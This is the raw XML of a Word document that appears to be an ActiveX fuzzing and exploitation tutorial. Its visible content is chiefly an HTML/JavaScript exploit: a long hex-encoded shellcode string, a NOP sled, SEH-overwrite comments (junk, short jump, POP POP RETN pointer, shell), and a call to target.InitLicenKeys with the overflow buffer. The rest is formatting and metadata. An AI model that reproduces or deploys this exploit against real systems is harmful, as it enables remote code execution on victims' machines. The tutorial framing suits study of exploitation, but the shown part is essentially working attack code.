              <w:t>"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4f\x4f\x42\x4d\x5a";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>while (nop.length&lt;16){ nop+=nop;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>//        [JUNK]         +    [ NSEH Pointer ]     +                [SEH Value]                       +   [SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>//  [  2048 Bytes]    +    [SHORT JUMP ]     +   [POINTER TO POP POP RETN ]   +   [ SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>arg1=junk+nseh+seh+nop+shell;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B03F86" w:rsidRDefault="00B03F86"/>
    <w:p w:rsidR="00040861" w:rsidRDefault="005F2281">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="418147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943600" cy="4181475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00040861" w:rsidSect="001C43DD">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05F" w:rsidRDefault="0093005F" w:rsidP="003319C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="0093005F" w:rsidRDefault="0093005F" w:rsidP="00331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8954"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="008059AD" w:rsidRDefault="008059AD">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:pBdr>
            <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          </w:pBdr>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="005A5D6B">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
        </w:fldSimple>
        <w:r>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
            <w:spacing w:val="60"/>
          </w:rPr>
          <w:t>Page</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="008059AD" w:rsidRDefault="008059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05F" w:rsidRDefault="0093005F" w:rsidP="003319C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="0093005F" w:rsidRDefault="0093005F" w:rsidP="00331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9AD" w:rsidRPr="005A5D6B" w:rsidRDefault="008059AD" w:rsidP="005A5D6B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="42"/>
        <w:u w:val="single"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005A5D6B">
      <w:rPr>
        <w:b/>
        <w:sz w:val="42"/>
        <w:u w:val="single"/>
      </w:rPr>
      <w:t>ActiveX Fuzzing and Exploita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91E57"/>
    <w:rsid w:val="00001B90"/>
    <w:rsid w:val="00040861"/>
    <w:rsid w:val="00102851"/>
    <w:rsid w:val="0011786B"/>
    <w:rsid w:val="00162E90"/>
    <w:rsid w:val="001704A5"/>
    <w:rsid w:val="001C43DD"/>
    <w:rsid w:val="001C4E21"/>
    <w:rsid w:val="001E3803"/>
    <w:rsid w:val="001F1448"/>
    <w:rsid w:val="00247F09"/>
    <w:rsid w:val="002C1DC1"/>
    <w:rsid w:val="00324D7A"/>
    <w:rsid w:val="003319C6"/>
    <w:rsid w:val="00342FAB"/>
    <w:rsid w:val="00402179"/>
    <w:rsid w:val="00414911"/>
    <w:rsid w:val="004F3041"/>
    <w:rsid w:val="00501C79"/>
    <w:rsid w:val="00510678"/>
    <w:rsid w:val="00511F6C"/>
    <w:rsid w:val="005A5D6B"/>
    <w:rsid w:val="005F2281"/>
    <w:rsid w:val="005F4F5A"/>
    <w:rsid w:val="00623F99"/>
    <w:rsid w:val="00645F7A"/>
    <w:rsid w:val="006612A9"/>
    <w:rsid w:val="00670BF6"/>
    <w:rsid w:val="006752CA"/>
    <w:rsid w:val="00693EB6"/>
    <w:rsid w:val="006A6492"/>
    <w:rsid w:val="006B01FB"/>
    <w:rsid w:val="006C61C8"/>
    <w:rsid w:val="00792A94"/>
    <w:rsid w:val="007D5C9F"/>
    <w:rsid w:val="008059AD"/>
    <w:rsid w:val="0084384A"/>
    <w:rsid w:val="008B333C"/>
    <w:rsid w:val="008B773E"/>
    <w:rsid w:val="008F61CE"/>
    <w:rsid w:val="00911AEC"/>
    <w:rsid w:val="0093005F"/>
    <w:rsid w:val="0098240F"/>
    <w:rsid w:val="009B6D5A"/>
    <w:rsid w:val="009C796D"/>
    <w:rsid w:val="00A0009E"/>
    <w:rsid w:val="00AD5A3E"/>
    <w:rsid w:val="00B03F86"/>
    <w:rsid w:val="00BA7C44"/>
    <w:rsid w:val="00BC1361"/>
    <w:rsid w:val="00C006C1"/>
    <w:rsid w:val="00C11FF0"/>
    <w:rsid w:val="00C13680"/>
    <w:rsid w:val="00C467EE"/>
    <w:rsid w:val="00C53E1A"/>
    <w:rsid w:val="00C83CE2"/>
    <w:rsid w:val="00CD6BF2"/>
    <w:rsid w:val="00CF769A"/>
    <w:rsid w:val="00D26CCE"/>
    <w:rsid w:val="00D363B3"/>
    <w:rsid w:val="00D84F75"/>
    <w:rsid w:val="00D91E57"/>
    <w:rsid w:val="00D962FF"/>
    <w:rsid w:val="00DA56A5"/>
    <w:rsid w:val="00E02544"/>
    <w:rsid w:val="00E22470"/>
    <w:rsid w:val="00E772C5"/>
    <w:rsid w:val="00EC7806"/>
    <w:rsid w:val="00ED1E73"/>
    <w:rsid w:val="00F53FE7"/>
    <w:rsid w:val="00FF4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57"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00CD6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319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9C6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00331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432F-546E-4CE5-8521-723ACFC6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20</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NME</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>PWNME</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-03-23T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-29T17:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>